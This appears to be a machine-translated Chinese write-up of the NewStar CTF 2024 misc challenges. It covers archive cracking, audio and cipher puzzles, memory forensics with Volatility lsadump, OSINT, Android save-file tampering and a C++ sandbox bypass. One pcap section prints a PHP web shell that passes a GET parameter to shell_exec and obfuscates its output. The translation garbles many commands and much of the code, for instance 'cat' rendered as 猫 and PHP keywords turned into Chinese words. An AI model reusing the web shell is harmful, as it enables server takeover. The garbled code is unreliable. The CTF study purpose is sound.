NewStar CTF 2024 misc WP

解压

压缩俄罗斯套娃，解压到最后一层，并提取文件

提示给出了常规规则。按照正常规则，密码被破解了。总共有五位数字，第四位是数字。

^([a-z]){3}\d[a-z]$ 共有五位数字。直接用ARCHPR爆破得到密码xtr4m。解压它并获得flag。

标题描述中提到的

令人愉悦的音乐

：

一首歌可以在前面和后面听到。根据提示（其实你也可以听到后半段音乐是倒着播放的），反向音频处理倒着播放，然后分析莫尔斯电码。

摩尔斯电码表可以手动翻译或使用在线解码。

粗的意思是：-，细的意思是： 间距或空格：用空格或/分隔

WhereIsFlag

纯命令手动搜索，在/proc/self/environ文件中找到真正的flag（可用于获取当前进程的环境变量），只需执行以下命令即可获取flag。

猫/proc/self/environ

迷宫

兑换代码

wireshark_checkin

wireshark_secret

联系标题描述查找Teyvat文字对照表

对照表说明了很多事情

我一开始尝试了中间的大字符串，但是大小写不对。

然后继续解密周围的小密文，得到：FLAGISASENTENCE IIAAELGTSFKFA

你知道FENCE MESIOAABGNHNSGOGMYEIADE

提示flag是一个句子，FENCE是栅栏加密MESIOAABGNHNSGOGMYEIADE

https://ctf.bugku.com/tool/railfence

包flag已提交，发现不正确。把它改成小写，发现就正确了。

最终的标志是：flag{maybegenshinisagoodgame}

字里行间的秘密

使用vscode打开，找到U+202c的宽度零字节

获取密码：it_is_k3y

使用密码打开word，找到一个空格。 Ctr+A 选择全部，复制并获取标志。

乐于助人的同学小明

vol.py -f image.raw imageinfo

可以看到，推荐的操作系统版本有：Win7SP1x86_23418、Win7SP0x86、Win7SP1x86_24000、Win7SP1x86。这里选择第一个（Win7SP1x86_23418）来尝试。如果它不起作用，请尝试其他方法。

voL.py -f image.raw --profile=Win/SP1x86_23418 lsadump

开头的0x48并不是密码，你可以把它理解为一个标志。除此之外，您还可以获得系统密码：ZDFyVDlfdTNlUl9wNHNTdzByRF9IQUNLRVIh。

最终标志是flag{ZDFyVDlfdTNlUl9wNHNTdzByRF9IQUNLRVIh}

用电流示踪剂见证台风沃尔特

第一步打开新闻视频链接

根据视频，我们得到以下信息：

必填报告：黑暗力量的崛起……对应版本：4月15日原版版本状态：必填信息已被篡改我们直接搜索报告名称

https://threatmon.io/storage/the-rise-of-dark-power-a-close-look-at-the-group-and-their-ransomware.pdf

可以看到我们需要的PDF文件，但是视频中还提到报告内容被篡改了。

所以当前版本肯定没有我们需要的信息。

出题者很幸运，找到了可以直接下载的原始PDF版本，就可以直接开始做题了。

但如果运气不好怎么办？我们邀请我们的网站时光机——回程机。

输入官网链接，启动Flow Tracer，正好有4月15日的版本。

下载文件，其余部分与视频中演示的相同。

去掉封底图片，获取Domain框中的内容，然后MD5，

当然，如果你能用肉眼直接读出视频中的模糊信息，出题者也会认出来。

将flag 包裹起来得到flag{6c3ea51b6f9d4f5e}。

赫塔的研究

http导出获取upload.php

?php

$有效负载=$_GET['有效负载'];

$payload=shell_exec($payload);

$bbb=创建函数(

base64_decode('J'.str_rot13('T').'5z'),

base64_decode('JG5zPWJhc2U2NF9lbmNvZGUoJG5zKTsNCmZvcigkaT0wOyRpPHN0cmxlbigkbnMpOyRp

Kz0xKXsNCiAgICBpZigkaSUy'.str_rot13('CG0kXKfAPvNtVPNtVPNtWT5mJlEcKG1m').'dHJfcm90MTMoJG5zWyRpXSk7DQo

gICAgfQ0KfQ0KcmV0dXJuICRuczs==')

）；

回声$bbb($payload);

?str_rot13() 函数对字符串执行ROT13 编码。

ROT13编码是通过将字母表中的每个字母向前移动13个字母获得的。数字和非字母字符保持不变。

'.'是php中的连接器，所以上传的php代码实际上是：

?php

$payload=$_GET['payload'];

$payload=shell_exec($payload);

$bbb=函数($ns) {

$ns=base64_encode($ns);

for ($i=0; $i strlen($ns); $i++) {

如果（$i％2==1）{

$ns[$i]=str_rot13($ns[$i]);

}

}

返回$ns；

};

回声$bbb($payload);

根据代码可以看到结果是base64编码的，然后里面的奇数字符用str_rot13编码。

然后我找到了请求该flag的包并对其进行了解码，但发现这是一个假flag。

?php

$结果='ZzxuZ3tmSQNsaGRsUmBsNzVOdKQkZaVZLa0tCt==';

$bbb=函数（$ns）{

for ($i=0; $i strlen($ns); $i++) {

如果（$i％2==1）{

$ns[$i]=str_rot13($ns[$i]);

}

}

返回$ns；

};

回声base64_decode($bbb($结果));

？后来我查找f.txt，发现flag:flag{sH3_i4_S0_6eAut1fuL.}

BGM 坏了吗？

当你用Audacity打开音频时，你很容易发现最后右声道有信息，而左声道是噪音。

根据标题描述，是拨号音，但不能直接释放。需要删除噪音。

选择将立体声分割为单声道» 关闭左声道» 导出

按键音（即DTMF）解密网站：DTMF Decoder

只需包裹标志即可{}

精彩游戏

Android私有目录位于/data/user/0/包名下

Android的shared_prefs一般用来存储软件配置数据

修改文件改变传递的关卡数据

通过第一关后，关闭游戏（这一点很重要）

ADB链接移动执行

外壳

亚行外壳

运行为com.pangbai.projectm

cd 共享首选项

猫net.osaris.turbofly.JumpyBall.xmlxml

?xml 版本='1.0' 编码='utf-8' 独立='是' ?

地图

布尔名称='cockpitView'值='true'/

int name='unlockedsolotracks' value='2' /

int name='unlockedtracks' value='2' /

int name='best0m0' value='130' /

int name='unlockedships' value='1' /

int name='userid' value='9705893' /

/地图软件有23个关卡，我们将解锁关卡数量更改为23个

通常，您应该使用adb push 来修改文件。这里为了方便我们直接把2替换成23。

外壳

sed -i 's/2/23/g' net.osaris.turbofly.JumpyBall.xml 打开游戏，发现所有关卡都解锁了。随意玩23个关卡。游戏结束后即可获得旗帜。

ez_jail

这题的初衷只是为了测试C++中{}（宏）替换运算符的知识

只要关键词使用正确，就可以在网上搜索到。然而出题者却未能执行出题，考试过程中出现了很多意想不到的问题。考虑到每个知识点的难度后，我觉得意外的难度和预想的解法没有太大区别，所以索性就成了半开放题。

我们观察代码的check函数

蟒蛇

def cpp_code_checker(代码):

if code: 中的“#include”

return False, '代码不允许包含库'

if code: 中的“#define”

return False, '代码不允许使用宏'

if 代码中的“{”或代码:中的“}”

返回（

假的，

'代码中不允许使用`{`或`}`，但必须是单个函数',

）

iflen(代码) 100:

return False, '代码太长'

return True, 'Code is valid' 这段代码好像过滤了#include #define等，但不知同学们有没有意识到，在#后面加一个空格可以绕过这个，也就是说可以用宏定义来进行编译前的预处理。

所以Payload可以是这样（感谢Yuro大师提供解决方案）

程序文件

# 定义user_code() write(STDOUT_FILENO, 'Hello, World!', 13);预期的解决方案是查找C++替代运算符的相关信息，然后使用% %&g